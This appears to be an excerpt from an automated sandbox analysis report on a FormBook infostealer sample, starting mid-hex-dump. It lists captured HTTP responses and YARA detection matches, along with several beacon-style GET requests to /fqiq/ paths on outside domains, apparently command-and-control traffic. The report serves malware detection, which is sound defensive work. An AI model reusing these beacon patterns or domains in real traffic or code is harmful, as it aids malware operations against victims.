20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 27 Oct 2021 17:14:36 GMTContent-Type: text/htmlContent-Length: 169Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 17:15:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797039-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://pepabo.com/
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: unknownDNS traffic detected: queries for: www.isshinn1.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1Host: www.isshinn1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1Host: www.rdoi.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1Host: www.megacinema.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1Host: www.passiverewardssystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1Host: www.sosoon.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1Host: www.24000words.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1Host: www.thedusi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: CtTYTpaAKA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
